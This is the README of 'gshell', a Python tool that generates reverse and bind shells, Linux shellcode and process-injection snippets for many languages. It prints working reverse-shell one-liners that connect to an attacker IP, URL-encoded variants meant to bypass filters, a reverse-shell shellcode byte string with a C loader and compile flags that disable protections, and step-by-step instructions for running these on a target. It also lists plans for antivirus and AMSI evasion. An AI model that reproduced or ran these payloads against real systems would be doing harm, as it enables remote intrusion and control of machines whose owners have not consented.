/gshell

A flexible and scalable cross-plaform shell generator tool

Primary LanguagePythonMIT LicenseMIT

Introduction

made-with-python built-with-love

A simple yet flexible cross-platform shell generator tool.

Name: G(Great) Shell

Description: A cross-platform shell generator tool that lets you generate whichever shell you want, in any system you want, giving you full control and automation.

If you find this tool helpful, then please give me a ⭐ as it tells me that I should add more features to it. (THANKS)

Is cross-platform, you can use it in operating systems such as:

  • Unix-based systems
  • GNU/Linux
  • Windows
  • macOS

Generates the following shells:

  • Bind Shells: The target has a listening port and we connect to the target.
  • Reverse Shells: We have a listening port and the target connects to us.

Supports the following encodings (as of now):

  • URL Encoding: Bypass URL filters
  • Base64/32/16 Encodings: Bypass string/keyword filters
  • PowerShell Base64 Encoding

Supports the follow IP versions:

  • IPv4
  • IPv6

Supported protocols:

  • TCP
  • UDP
  • ICMP

Note: You can add your own shells that use other protocols such as DNS.

Supports the following languages and tools:

  • PowerShell
  • Python
  • Bash
  • Sh
  • Perl
  • Socat
  • Netcat
  • Nc
  • Awk
  • Lua
  • NodeJS
  • OpenSSL
  • PHP
  • Ruby
  • Telnet
  • Golang
  • C#
  • Dart
  • Groovy
  • Many more...

It is limitless, feel free to add as many as you desire!

The shells are stored in markdown files as it makes it easy for everyone.

You can add more bind shells by adding markdown code blocks the following file:

shells/bind_shells.md

You can also add more reverse shells by adding markdown code blocks the following file:

shells/reverse_shells.md

These can be one-liners and multi-liners, it doesn't matter. You can even add C# multi-liners code blocks if you want.

Here is a reverse shell example command:

bash -i >& /dev/tcp/192.168.10.11/433 0>&1

To add another shell simply replace the IP address and the port placeholders or variables values with these placeholders in your code or command:

  • $ip: IP address
  • $port: Port number

Here is an example:

bash -i >& /dev/tcp/$ip/$port 0>&1

Note: It also offers advice and tips for performing and troubleshooting attacks.

Overview

This is the help menu:

PS C:\gshell> python gshell.py -h
usage: gshell.py [-i <IP ADDRESS>] [-p <PORT NUMBER>] [-s <SHELL TYPE>] [-r] [-b] [--hollowing] [--injector] [--shellcode] [--srev] [--sbind] [--linux] [--base64] [--base32] [--base16] [--url]
                 [--no-block] [-l] [-a] [-h]

 ██████  ███████ ██   ██ ███████ ██      ██
██       ██      ██   ██ ██      ██      ██
██   ███ ███████ ███████ █████   ██      ██
██    ██      ██ ██   ██ ██      ██      ██
 ██████  ███████ ██   ██ ███████ ███████ ███████

Generate shellcodes, bind shells and/or reverse shells with style

            Version: 1.2
            Author: nozerobit
            Twitter: @nozerobit

Options:
  -i <IP ADDRESS>, --ip <IP ADDRESS>
                        Specify the IP address
  -p <PORT NUMBER>, --port <PORT NUMBER>
                        Specify the port number
  -s <SHELL TYPE>, --shell <SHELL TYPE>
                        Specify a shell type (python, nc, bash, etc)

Payload Types:
  -r, --reverse         Victim communicates back to the attacking machine
  -b, --bind            Open up a listener on the victim machine

Snippets Types:
  --hollowing           Print process hollowing code snippets
  --injector            Print process injector code snippets

Shellcode Required Options:
  --shellcode           Generate shellcodes, requires --srev or --sbind and --linux
  --srev                Reverse shell shellcode
  --sbind               Bind shell shellcode
  --linux               Linux shellcode

Encoding Options:
  --base64              Add base64 encoding
  --base32              Add base32 encoding
  --base16              Add base16 encoding
  --url                 Add URL encoding

Markdown Options:
  --no-block            Skip ```
                        code
                        blocks
                        ``` while parsing

Help Options:
  -l, --list            List the available shell types
  -a, --advice          Print advice and tips to get connections
  -h, --help            Show this help message and exit

Example of Listeners and Connectors

Connect with nc TCP:

nc -v <IP> <PORT>

Connect with nc UDP:

nc -vu <IP> <PORT>

Note: Replace <IP> with the IP address of the target and replace <PORT> with the target port number.

Setup a listener with nc TCP:

nc -vlp <PORT>

Setup a listener with nc UDP:

nc -vulp <PORT>

Note: Replace <PORT> with the port number of the target.

Example of Bind Shells & Reverse Shells

Example, generate bash reverse shells:

PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443  -r -s bash 
[+] The IPv4 address: 192.168.111.120 is valid.
[+] The port number: 443 is valid.
[+] Shell type is valid
[+] Preparing reverse shells
[+] Generating bash shells
bash -i >& /dev/tcp/192.168.111.120/443 0>&1

----------------NEXT CODE BLOCK----------------

0<&196;exec 196<>/dev/tcp/192.168.111.120/443; sh <&196 >&196 2>&196

----------------NEXT CODE BLOCK----------------

/bin/bash -l > /dev/tcp/192.168.111.120/443 0<&1 2>&1

----------------NEXT CODE BLOCK----------------

bash -i >& /dev/tcp/192.168.111.120/443 0>&1

----------------NEXT CODE BLOCK----------------

bash -i >& /dev/udp/192.168.111.120/443 0>&1

Example of Encodings

Here is an example of an encoding:

PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443 -r -s bash --url 
[+] The IPv4 address: 192.168.111.120 is valid.
[+] The port number: 443 is valid.
[+] Shell type is valid
[+] Preparing reverse shells
[+] Generating bash shells
[+] Adding URL Encoding
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3E%261%0A

----------------NEXT CODE BLOCK----------------

0%3C%26196%3Bexec+196%3C%3E%2Fdev%2Ftcp%2F192.168.111.120%2F443%3B+sh+%3C%26196+%3E%26196+2%3E%26196%0A

----------------NEXT CODE BLOCK----------------

%2Fbin%2Fbash+-l+%3E+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3C%261+2%3E%261%0A

----------------NEXT CODE BLOCK----------------

bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3E%261%0A

----------------NEXT CODE BLOCK----------------

bash+-i+%3E%26+%2Fdev%2Fudp%2F192.168.111.120%2F443+0%3E%261

----------------NEXT CODE BLOCK----------------

Example of Shellcodes

Here is an example of a shellcode:

PS C:\gshell> python .\gshell.py -i 192.168.220.131 -p 4433 --shellcode --srev --linux
[+] The IPv4 address: 192.168.220.131 is valid.
[+] The port number: 4433 is valid.
[+] Generating reverse shell shellcodes
[+] Generating Linux shellcodes
\x89\xe5\x31\xc0\x31\xc9\x31\xd2\x50\x50\xb8\x1\x1\x1\x1\xbb\xc1\xa9\xdd\x82\x31\xc3\x53\x66\x68\x11\x51\x66\x6a\x02\x31\xc0\x31\xdb\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x66\xb8\x6a\x01\x89\xe1\x89\xea\x29\xe2\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

We could use the generate shellcode in another program or script:

#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned char code[] = "SHELLCODE_HERE";
    printf("The shellcode length is: %d\n", strlen(code));
    void (*s)() = (void *)code;
    s();
    return 0;
}

Install 32-bit headers and libraries:

sudo apt-get install gcc-multilib

As an example we could compile the code above:

gcc -m32 -fno-stack-protector -z execstack example.c -o example

More information about gcc compilation can be found here.

Run the example program on the target to receive the reverse shell:

chmod +x ./example && ./example

Installation in Linux

Clone or download the repository:

git clone https://github.com/nozerobit/gshell

Install the requirements:

python3 -m pip install -r gshell/requirements.txt

Add the tool to the $PATH environment variable:

sudo ln -s $(pwd)/gshell/gshell.py /usr/local/bin/gshell.py && chmod +x /usr/local/bin/gshell.py

Execute the tool:

gshell.py

Installation in Windows

Clone or download the repository:

git clone https://github.com/nozerobit/gshell C:\\Tools

Note: I created a directory named Tools in the C:\ root directory. You can create this directory with the command md C:\Tools.

Install chocolatey with CMD as Administrator:

@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))" && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin

Install python3 in Windows:

choco install -y python3

Install pip:

python -m pip install --upgrade pip

Install the requirements:

python -m pip install -r gshell/requirements.txt

Note: You can change the directory if you want, just make sure that it contains the gshell project folder.

Change to the project directory:

cd C:\Tools

Execute the tool:

python gshell.py

Contact & Contributing

If you find any issues then you can open an issue or contact me on twitter.

If you want to contribute then please feel free.

Any feedback is appreciated.

ToDo

The version 2.0 should have the following:

  1. Encryptors: To bypass AVs
  2. Obfuscators: To bypass AVs
  3. Anti-AMSI: To bypass AMSI
  4. Add Windows Shellcode